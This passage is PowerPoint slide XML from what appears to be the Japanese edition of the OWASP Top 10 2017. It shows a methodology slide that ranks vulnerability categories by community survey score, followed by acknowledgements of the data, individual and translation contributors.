                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>100%</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="950" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>となるよう調整しました。発生率を計算するために、各脆弱性が含まれていることが判明したアプリケーションの割合を計算しました。発生率のランキングは、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="950" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="950" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>に位置付けられている全てのリスクの計算のために使いました。</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" dirty="0">
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>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en-US" sz="2800" dirty="0"/>
              <a:t>+DAT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>方法論とデータ</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="16" name="Table 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="128418175"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="495298" y="2972780"/>
          <a:ext cx="5904031" cy="1260139"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" bandRow="1"/>
              <a:tblGrid>
                <a:gridCol w="340617">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="5026683">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="536731">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="215804">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="800" b="1" i="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ランク</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" i="0" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>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ja-JP" altLang="en-US" sz="900" b="1" i="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>脆弱性カテゴリ</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="1" i="0" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>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ja-JP" altLang="en-US" sz="900" b="1" i="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>スコア</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" i="0" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>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30839">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>1</a:t>
                      </a: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mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Exposure of Private Information ('Privacy Violation') [CWE-359]</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mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>748</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15804">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900">
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>2</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mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Cryptographic Failures [CWE-310/311/312/326/327]</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mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>584</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15804">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900">
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>3</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mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Deserialization of Untrusted Data [CWE-502]</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="28438" marR="28438" marT="18000" marB="1800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mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>514</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0944">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900">
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>4</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effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Authorization Bypass Through User-Controlled Key (IDOR* &amp; Path Traversal) [CWE-639]</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="28438" marR="28438" marT="18000" marB="1800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mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>493</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90944">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900">
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>5</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRP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effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Insufficient Logging and Monitoring  [CWE-223 / CWE-778]</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="28438" marR="28438" marT="18000" marB="1800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mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>440</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="28438" marR="28438" marT="18000" marB="180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2590408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sz="2800" dirty="0"/>
              <a:t>+ACK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>謝辞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 14"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="774474250"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="8722" y="996162"/>
          <a:ext cx="6858000" cy="879411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28471">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>データコントリビュータへの謝辞</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2287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050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Top 10 2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>の作成に際して、脆弱性の情報を提供してくださった以下の組織に対して感謝の意を表します。</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1050" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                      </a:br>
                      <a:endParaRPr lang="en-US" sz="1050" dirty="0">
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                      </a:endParaRPr>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20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10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ja-JP" altLang="en-US" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>データコントリビュータの一覧は</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>一般公開</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>されています。</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" kern="1200" dirty="0">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284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個人のコントリビュータへの謝辞</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:uLnTx/>
                        <a:uFillTx/>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608774898"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="36670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200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>GitHub</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>において</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>に貢献するために多くの時間を費やした以下の個人のコントリビュータ及び</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Twitter</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>、電子メール、その他の手段で貢献してくださった方々に感謝の意を表します。</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ja-JP" sz="1050" kern="120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u="none" kern="1200" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>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kern="1200" dirty="0">
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>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913044864"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="2250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b="1" kern="1200" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>日本語版翻訳コントリビュータへの謝辞</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1" kern="1200" dirty="0">
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>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113917270"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="9165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kern="1200" dirty="0">
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>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280772770"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C6CA28A-C875-42F4-A969-9E4EBCDC2625}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="61269" y="5313040"/>
            <a:ext cx="6735456" cy="2880320"/>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alonergan</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ameft</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anantshri</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bandrzej</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bchurchill</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binarious</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bkimminich</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Boberski</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borischen</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chrish</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clerkendweller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davewichers</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drkknight</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drwetter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ecbftw</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einsweniger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ekobrin</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eoftedal</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frohoff</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fzipi</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gebl</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gilzow</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grnd</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hiralph</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HoLyVieR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ilatypov</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irbishop</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itscooper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ivanr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jeremylong</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jhaddix</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jmanico</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joaomatosf</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jrmithdobbs</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jsteven</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jvehent</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katyanton</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kerberosmansour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koto</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mwcoates</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nickthetait</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ninedter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ossie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-git</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PauloASilva</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PeterMosmans</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pontocom</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psiinon</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pwntester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raesene</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riramar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ruroot</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securitybits</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sreenathsasikumar</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stefanb</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sumitagarwalusa</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taprootsec</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tghosth</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TheJambo</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toddgrotenhuis</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troymarshall</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tsohlacol</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vdbaan</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="80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800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>yohgaki</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="800" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81EC5A71-CDF7-40E6-9F8A-7B7F0554B2F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8722" y="1532620"/>
            <a:ext cx="6849278" cy="2601191"/>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ANCAP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">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AsTech</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Consulting</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BUGemot</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Colegio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> LaSalle Monteria</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ContextIS</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Easybss</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Edgescan</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Hamed</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iBLISS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Seguran̤a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Intelig̻encia</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ITsec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Security Services </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>bv</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Khallagh</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M. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Limacher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> IT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Dienstleistungen</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Osampa</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Paladion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Networks</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Purpletalk</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en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Softtek</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="90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en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Web.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="テキスト ボックス 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F3FB3A8-81C1-5243-8B9A-85B4A9FE474C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="202339" y="8232285"/>
            <a:ext cx="6453319" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Dirk Wetter</a:t>
            </a:r>
            <a:r>
